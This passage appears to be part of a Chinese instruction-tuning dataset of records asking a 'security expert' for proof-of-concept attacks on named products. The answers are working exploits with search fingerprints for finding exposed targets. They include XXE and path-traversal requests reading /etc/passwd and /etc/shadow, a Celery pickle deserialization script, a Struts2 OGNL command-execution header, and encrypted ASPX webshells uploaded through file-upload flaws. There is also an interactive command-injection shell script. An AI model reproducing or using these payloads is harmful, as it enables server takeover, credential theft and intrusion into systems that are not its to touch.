boundary=532c7611457d40f4ae4cd9422973416b\n\n--532c7611457d40f4ae4cd9422973416b\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"TEST.aspx\"\nContent-Type: image/jpeg\n\n<% Response.Write(\"Test\"); %>\n--532c7611457d40f4ae4cd9422973416b--\"\n3. POST /DialogTemplates/SelectImage.aspx?type=titleimg&size=30*100&pageindex=1&iscallback=true HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/任我行 管家婆 订货易在线商城 SelectImage.aspx 任意文件上传漏洞.md"}
    844. 

  844. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Dogtag PKI XML实体注入漏洞 CVE-2022-2414\n漏洞描述:Dogtag PKI 的XML解析器存在安全漏洞,该漏洞源于在分析 XML 文档时访问外部实体可能会导致 XML 外部实体 (XXE) 攻击。此漏洞允许远程攻击者通过发送特制的 HTTP 请求来潜在地检索任意文件的内容。\n影响版本:``` Dogtag PKI ```\n网络测绘:``` title=\"Identity Management\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-2414\n【POC利用方法】\n1. title=\"Identity Management\"\n2. POST /ca/rest/certrequests\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n3. Content-Type: application/xml\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Dogtag PKI XML实体注入漏洞 CVE-2022-2414.md"}
    845. 

  845. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Casbin get-users 账号密码泄漏漏洞\n漏洞描述:Casbin get-users api接口存在账号密码泄漏漏洞,攻击者通过漏洞可以获取用户敏感信息\n影响版本:``` Casbin ```\n网络测绘:``` title=\"Casdoor\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"Casdoor\"\n2. /api/get-users?p=123&pageSize=123\n3. Casbin get-users api接口存在账号密码泄漏漏洞,攻击者通过漏洞可以获取用户敏感信息\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Casbin get-users 账号密码泄漏漏洞.md"}
    846. 

  846. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Celery <4.0 Redis未授权访问+Pickle反序列化利用\n漏洞描述:Celery 是一个简单、灵活且可靠的分布式系统,用于处理大量消息,同时为操作提供维护此类系统所需的工具。它是一个专注于实时处理的任务队列,同时也支持任务调度。 在Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在未授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。 参考阅读: - https://docs.celeryproject.org/en/stable/userguide/configuration.html - https://www.bookstack.cn/read/celery-3.1.7-zh/8d5b10e3439dbe1f.md#dhfmrk - https://docs.celeryproject.org/en/stable/userguide/calling.html#serializers - https://www.jianshu.com/p/52552c075bc0 - https://www.runoob.com/w3cnote/python-redis-intro.html - https://blog.csdn.net/SKI_12/article/details/85015803\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. import pickle\nimport json\nimport base64\nimport redis\nimport sys\nr = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0)\n\nori_str=\"{\\\"content-type\\\": \\\"application/x-python-serialize\\\", \\\"properties\\\": {\\\"delivery_tag\\\": \\\"16f3f59d-003c-4ef4-b1ea-6fa92dee529a\\\", \\\"reply_to\\\": \\\"9edb8565-0b59-3389-944e-a0139180a048\\\", \\\"delivery_mode\\\": 2, \\\"body_encoding\\\": \\\"base64\\\", \\\"delivery_info\\\": {\\\"routing_key\\\": \\\"celery\\\", \\\"priority\\\": 0, \\\"exchange\\\": \\\"celery\\\"}, \\\"correlation_id\\\": \\\"6e046b48-bca4-49a0-bfa7-a92847216999\\\"}, \\\"headers\\\": {}, \\\"content-encoding\\\": \\\"binary\\\", \\\"body\\\": \\\"gAJ9cQAoWAMAAABldGFxAU5YBQAAAGNob3JkcQJOWAQAAABhcmdzcQNLZEvIhnEEWAMAAAB1dGNxBYhYBAAAAHRhc2txBlgJAAAAdGFza3MuYWRkcQdYAgAAAGlkcQhYJAAAADZlMDQ2YjQ4LWJjYTQtNDlhMC1iZmE3LWE5Mjg0NzIxNjk5OXEJWAgAAABlcnJiYWNrc3EKTlgJAAAAdGltZWxpbWl0cQtOToZxDFgGAAAAa3dhcmdzcQ19cQ5YBwAAAHRhc2tzZXRxD05YBwAAAHJldHJpZXNxEEsAWAkAAABjYWxsYmFja3NxEU5YBwAAAGV4cGlyZXNxEk51Lg==\\\"}\"\ntask_dict = json.loads(ori_str)\ncommand = 'touch /tmp/celery_success'\nclass Person(object):\n    def __reduce__(self):\n        # 未导入os模块,通用\n        return (__import__('os').system, (command,))\npickleData = pickle.dumps(Person())\ntask_dict['body']=base64.b64encode(pickleData).decode()\nprint(task_dict)\nr.lpush('celery',json.dumps(task_dict))\n3. pip install redis\npython exploit.py [主机IP]\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Celery 4.0 Redis未授权访问+Pickle反序列化利用.md"}
    847. 

  847. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:汉王人脸考勤管理系统 Check SQL注入漏洞\n漏洞描述:汉王人脸考勤管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。\n影响版本:``` 汉王人脸考勤管理系统 ```\n网络测绘:``` title=\"\"汉王人脸考勤管理系统\"\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"\"汉王人脸考勤管理系统\"\"\n2. POST /Login/Check HTTP/1.1\nHost: x.x.x.x\nContent-Length: 27\nAccept: */*\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: http://x.x.x.x:8088\nReferer: http://x.x.x.x:8088/Login/Index\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: ASP.NET_SessionId=otvxgfy0csmrw4i5y5t24oo1\nConnection: close\n\nstrName=admin&strPwd=123456\n3. sqlmap -r postwang.txt -p strName  --current-user\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/汉王人脸考勤管理系统 Check SQL注入漏洞.md"}
    848. 

  848. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Active UC index.action 远程命令执行漏洞\n漏洞描述:网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令\n影响版本:``` Active UC ```\n网络测绘:``` title=\"网动统一通信平台(Active UC)\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"网动统一通信平台(Active UC)\"\n2. POST /acenter/index.action HTTP/1.1\nCookie: SessionId=96F3F15432E0660E0654B1CE240C4C36\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\nCharsert: UTF-8\nContent-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170\nCache-Control: no-cache\nPragma: no-cache\nHost: \nAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\nConnection: keep-alive\nContent-Length: 196\n\n-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n\nxxxxxxx\n-----------------------------18012721719170\n3. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Active UC index.action 远程命令执行漏洞.md"}
    849. 

  849. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:龙璟科技 电池能量BEMS downloads 任意文件下载漏洞\n漏洞描述:龙璟科技 电池能量BEMS 存在接口可任意文件下载获取服务器任意文件信息\n影响版本:``` 龙璟科技 电池能量BEMS ```\n网络测绘:``` title=电池能量管理系统 BEMS ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 龙璟科技 电池能量BEMS\n2. title=电池能量管理系统 BEMS\n3. /api/downloads?fileName=../../../../../../../../etc/shadow\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/龙璟科技 电池能量BEMS downloads 任意文件下载漏洞.md"}
    850. 

  850. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Fhem FileLog_logWrapper 任意文件读取漏洞 CVE-2020-19360\n漏洞描述:FHEM在6.0版本中存在文件包含漏洞,该漏洞源于允许FHEM/FileLog_logWrapper file参数允许攻击者包含文件,攻击者可以利用此漏洞导致敏感信息泄露。\n影响版本:``` FHEM 6.0 ```\n网络测绘:``` title==\"Home, Sweet Home\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-19360\n【POC利用方法】\n1. title==\"Home, Sweet Home\"\n2. /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Fhem FileLog_logWrapper 任意文件读取漏洞 CVE-2020-19360.md"}
    851. 

  851. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Lanproxy 目录遍历漏洞 CVE-2021-3019\n漏洞描述:Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。\n影响版本:``` Lanproxy 0.1 ```\n网络测绘:``` header= \"Server: LPS-0.1\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-3019\n【POC利用方法】\n1. Lanproxy 0.1\n2. header= \"Server: LPS-0.1\"\n3. GET /../conf/config.properties HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nConnection: close\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Lanproxy 目录遍历漏洞 CVE-2021-3019.md"}
    852. 

  852. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OfficeWeb365 SaveDraw 任意文件上传漏洞\n漏洞描述:OfficeWeb365 SaveDraw 接口存在任意文件上传漏洞,攻击者通过漏洞可以在服务器中上传任意文件获取服务器权限\n影响版本:OfficeWeb365\n网络测绘:``` \"OfficeWeb365\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"OfficeWeb365\"\n2. POST /PW/SaveDraw?path=../../Content/img&idx=6.ashx HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.434.18 Safari/537.36\nContent-Length: 990\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\nConnection: close\n\ndata:image/png;base64,01s34567890123456789y12345678901234567m91<%@ WebHandler Language=\"C#\" Class=\"Handler\" %>using System;using System.I0;using System.Reflection;using System.Text;using System.Web;using System.WebSessionState;using&System.Security.Cryptography;public class Handler : IHttpHandler,IRequiresSessionState{public void=&ProcessRequest(HttpContext context){try{string key=\"900bc885d7553375\";byteDk=&Encoding.Default.GetBytes(key);context.Session.AddC\"sky\", key);StreamReader sr=new&StreamReader(contextRequest.InputStream);string line=sr.ReadLine;if(!string.IsNullOrEmpty(line)){byteDc=&Convert.FromBase64String(line);Assembly assembly=&typeof(Environment).Assembly;RijndaelManaged rm=(RijndaelManaged)&assembly.CreateInstance(\"System.Secur\"+\"ityCrypto\"+\"graphy.Rijnda\"+\"elm anaged\");byte[ data=rm.CreateDecryptorCk,k)TransformFinalBlock(c,0, c.Length);Assembly.Load(data)CreateInstance(\"U\").Equals(context);sr.clo se();}}catch {}}public bool IsReusable{get{return false;}}}}---\n3. /Content/img/UserDraw/drawPW6.ashx\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/OfficeWeb365 SaveDraw 任意文件上传漏洞.md"}
    853. 

  853. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Confluence server-info.action 属性覆盖导致权限绕过漏洞 CVE-2023-22515\n漏洞描述:Atlassian Confluence是企业广泛使用的wiki系统。 2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用 `/server-info.action` 端点传递 `bootstrapStatusProvider.applicationConfig.setupComplete` 参数,使服务器处于安装未完成状态,以访问受限制的端点并创建未经授权的 Confluence 管理员帐户,登录 Confluence 实例后台。 该漏洞不影响8.0.0以前的版本。 参考链接: - https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html - https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis\n网络测绘:``` app=\"ATLASSIAN-Confluence\" title==\"登录 - Confluence\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-22515\n【POC利用方法】\n1. app=\"ATLASSIAN-Confluence\"\ntitle==\"登录 - Confluence\"\n2. docker compose up -d\n3. GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1\nHost: localhost:8090\nAccept-Encoding: gzip, deflate, br\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36\nConnection: close\nCache-Control: max-age=0\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Confluence server-info.action 属性覆盖导致权限绕过漏洞 CVE-2023-22515.md"}
    854. 

  854. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:亿邮电子邮件系统 moni_detail.do 远程命令执行漏洞\n漏洞描述:亿邮电子邮件系统 存在远程命令执行漏洞,攻击者可以执行任意命令\n影响版本:``` 亿邮电子邮件系统 ```\n网络测绘:``` body=\"亿邮电子邮件系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"亿邮电子邮件系统\"\n2. POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nContent-Length: 39\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\n\ntype='|cat /etc/passwd||'\n3. import requests\nimport sys\nimport random\nimport re\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mVersion: Eyou Email SYSTEM                                       \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+  \\033[36mCmd         >>> whoami                                            \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url, cmd):\n    vuln_url = target_url + \"/webadm/?q=moni_detail.do&action=gragh\"\n    headers = {\n            \"Content-Type\": \"application/x-www-form-urlencoded\"\n    }\n    data = \"type='|cat /etc/passwd||'\"\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)\n        print(\"\\033[32m[o] 正在请求 {}//webadm/?q=moni_detail.do&action=gragh \\033[0m\".format(target_url))\n        if \"root\" in response.text and response.status_code == 200:\n            print(\"\\033[32m[o] 目标 {}存在漏洞 ,成功执行 cat /etc/passwd \\033[0m\".format(target_url))\n            print(\"\\033[32m[o] 响应为:\\n{} \\033[0m\".format(response.text))\n            while True:\n                cmd = input(\"\\033[35mCmd >>> \\033[0m\")\n                if cmd == \"exit\":\n                    sys.exit(0)\n                else:\n                    POC_2(target_url, cmd)\n        else:\n            print(\"\\033[31m[x] 请求失败 \\033[0m\")\n            sys.exit(0)\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\ndef POC_2(target_url, cmd):\n    vuln_url = target_url + \"/webadm/?q=moni_detail.do&action=gragh\"\n    headers = {\n        \"Content-Type\": \"application/x-www-form-urlencoded\"\n    }\n    data = \"type='|{}||'\".format(cmd)\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)\n        print(\"\\033[32m[o] 响应为:\\n{} \\033[0m\".format(response.text))\n\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\n\nif __name__ == '__main__':\n    title()\n    cmd = 'cat /etc/passwd'\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url, cmd)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/亿邮电子邮件系统 moni_detail.do 远程命令执行漏洞.md"}
    855. 

  855. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Alibaba Nacos 集群 Raft 反序列化漏洞 CNVD-2023-45001\n漏洞描述:该漏洞源于 Nacos 集群处理部分 Jraft 请求时,未限制使用 hessian 进行反 。序列化,攻击者可以通过发送特制的请求触发该漏洞,最终执行任意远程代码。\n影响版本:``` 1.4.0 <= Nacos < 1.4.6 2.0.0 <= Nacos < 2.2.3 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 1.4.0 <= Nacos < 1.4.6\n2.0.0 <= Nacos < 2.2.3\n2. exp:https://github.com/c0olw/NacosRce/\n3. 1. 默认配置下该漏洞仅影响 Nacos 集群间 Raft 协议通信的 7848 端口,此端口不承载客户端请求,可以通过限制集群外部 IP 访问 7848 端口来进行缓解。\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Alibaba Nacos 集群 Raft 反序列化漏洞 CNVD-2023-45001.md"}
    856. 

  856. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MKdocs 任意文件读取漏洞 CVE-2021-40978\n漏洞描述:MKdocs中存在通过 %2e%2e 来遍历目录,读取敏感文件\n影响版本:``` Mkdocs 1.2.2 ```\n网络测绘:``` title=\"My Docs\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-40978\n【POC利用方法】\n1. Mkdocs 1.2.2\n2. title=\"My Docs\"\n3. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/MKdocs 任意文件读取漏洞 CVE-2021-40978.md"}
    857. 

  857. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:CMA客诉管理系统 upFile.ashx 任意文件上传漏洞\n漏洞描述:CMA客诉管理系统 upFile.ashx文件存在任意文件上传漏洞,通过漏洞攻击者可以上传任意文件控制服务器\n影响版本:``` CMA客诉管理系统 ```\n网络测绘:``` title=\"CMA客诉管理系统手机端\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"CMA客诉管理系统手机端\"\n2. POST /upFile/upFile.ashx HTTP/1.1\nHost: \nContent-Length: 562\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: null\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarymXf9pBIUlDVOYtnZ\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nConnection: close\n\n------WebKitFormBoundarymXf9pBIUlDVOYtnZ\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.aspx\"\nContent-Type: application/octet-stream\n\n<%@ Page Language=\"C#\" %><%@Import Namespace=\"System.Reflection\"%><%Session.Add(\"k\",\"e45e329feb5d925b\");byte[] k = Encoding.Default.GetBytes(Session[0] + \"\"),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"U\").Equals(this);%>\n\n------WebKitFormBoundarymXf9pBIUlDVOYtnZ--\n3. ------WebKitFormBoundarymXf9pBIUlDVOYtnZ--\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/CMA客诉管理系统 upFile.ashx 任意文件上传漏洞.md"}
    858. 

  858. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Gitlist 0.6.0 远程命令执行漏洞 CVE-2018-1000533\n漏洞描述:gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本及以前,存在一处命令参数注入问题,可以导致远程命令执行漏洞。\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2018-1000533\n【POC利用方法】\n1. docker-compose up -d\n2. public function searchTree($query, $branch)\n{\n    if (empty($query)) {\n        return null;\n    }\n\n    $query = escapeshellarg($query);\n\n    try {\n        $results = $this->getClient()->run($this, \"grep -i --line-number {$query} $branch\");\n    } catch (\\RuntimeException $e) {\n        return false;\n    }\n3. git grep -i --line-number -e '--open-files-in-pager=id;' master\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Gitlist 0.6.0 远程命令执行漏洞 CVE-2018-1000533.md"}
    859. 

  859. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 SSL VPN 客户端远程文件下载\n漏洞描述:深信服 SSL VPN 客户端存在远程文件下载,且文件可控下载后可执行\n影响版本:``` 深信服 SSL VPN ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 深信服 SSL VPN\n2. InitECAgent -> 初始化\nGetEncryptKey -> 获取加密密钥\nDoConfigure -> 配置\nCheckReLogin -> 检查重新登录\nCheckProxySetting -> 检查代理设置\nUpdateControls -> 更新控制\nDoQueryService -> 查询服务\n3. https://127.0.0.1:54530/ECAgent/?op=InitECAgent&arg1=vpn.xxx.edu.cn%20443&callback=EA_cb10000\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 SSL VPN 客户端远程文件下载.md"}
    860. 

  860. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:拓尔思 TRS testCommandExecutor.jsp 远程命令执行漏洞\n漏洞描述:拓尔思 TRS testCommandExecutor.jsp测试文件存在远程命令执行漏洞,当网站运维者未删除测试文件时,攻击者通过漏洞可以获取服务器权限\n影响版本:``` 拓尔思-TRS ```\n网络测绘:``` \"TRS媒资管理系统登录页面\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"TRS媒资管理系统登录页面\"\n2. /mas/front/vod/main.do?method=newList&view=forward:/sysinfo/testCommandExecutor.jsp&cmdLine=dir&workDir=&pathEnv=&libPathEnv=\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/拓尔思 TRS testCommandExecutor.jsp 远程命令执行漏洞.md"}
    861. 

  861. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440\n漏洞描述:ShowDoc AdminUpdateController.class.php 文件中的更新部分代码没有鉴权且存在任意文件上传漏洞\n影响版本:``` ShowDoc < V2.9.5 ```\n网络测绘:``` app=\"ShowDoc\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-36440\n【POC利用方法】\n1. ShowDoc < V2.9.5\n2. app=\"ShowDoc\"\n3. public function download(){\n        set_time_limit(1000);\n        ini_set('memory_limit','500M');\n        $new_version = I(\"new_version\") ;\n        $file_url = I(\"file_url\") ;\n        $version_num = str_replace(\"v\",\"\",$new_version) ;\n\n        $showdoc_path = \"../\" ;\n\n        // 进行文件读写权限检查\n        if(!$this->new_is_writeable($showdoc_path)\n            || !$this->new_is_writeable($showdoc_path.\"Sqlite/\" )\n            || !$this->new_is_writeable($showdoc_path.\"web/\" )\n            || !$this->new_is_writeable($showdoc_path.\"web/index.php\" )\n            || !$this->new_is_writeable($showdoc_path.\"server/\" )\n            || !$this->new_is_writeable($showdoc_path.\"server/vendor/autoload.php\" )\n            || !$this->new_is_writeable($showdoc_path.\"server/Application/Api\" )\n        ){\n            $this->sendError(10101,'请手动给showdoc安装目录下的所有文件可写权限,否则程序无法覆盖旧文件');\n            return ;\n        }\n\n        $temp_dir = sys_get_temp_dir().\"/showdoc_update/\";\n        $zip_file = $temp_dir.'showdoc-'.$version_num.'.zip' ;\n        mkdir($temp_dir) ;\n        unlink($zip_file);\n        $file = file_get_contents($file_url);\n        file_put_contents($zip_file,$file);\n        \n        $zip = new \\ZipArchive();\n        $flag = $zip->open($zip_file);\n        if($flag!==true){\n            $this->sendError(10101,'下载更新压缩包失败');\n            return ;\n        }\n        $zip->extractTo($temp_dir);\n        $flag = $zip->close();\n        \n        $zip_file_subpath = $temp_dir.'showdoc-'.$version_num.\"/\" ;\n        \n        if(file_exists($zip_file_subpath.'composer.json') && file_exists($zip_file_subpath.'web/index.php') && file_exists($zip_file_subpath.'server/vendor/autoload.php') ){\n            //echo $zip_file_subpath.'存在';\n            // 移动目录到upload/update\n            $this->copydir($zip_file_subpath ,$showdoc_path.'Public/Uploads/update/' );\n            $this->deldir($temp_dir);\n            $this->sendResult(array());\n        \n        }else{\n            $this->sendError(10101,'下载更新压缩包后,解压的文件缺失');\n            return ;\n        }\n    }\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440.md"}
    862. 

  862. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Smartbi RMIServlet 登陆绕过漏洞\n漏洞描述:该漏洞源于 Smartbi 默认存在内置用户,在使用特定接口时,攻击者可绕过用户身份认证机制获取内置用户身份凭证,随后可使用获取的身份凭证调用后台接口,最终可能导致敏感信息泄露和代码执行。\n影响版本:``` V7 <= Smartbi <=V10 ```\n网络测绘:``` app=\"SMARTBI\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. V7 <= Smartbi <=V10\n2. app=\"SMARTBI\"\n3. http://your-ip/smartbi/vision/RMIServlet\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Smartbi RMIServlet 登陆绕过漏洞.md"}
    863. 

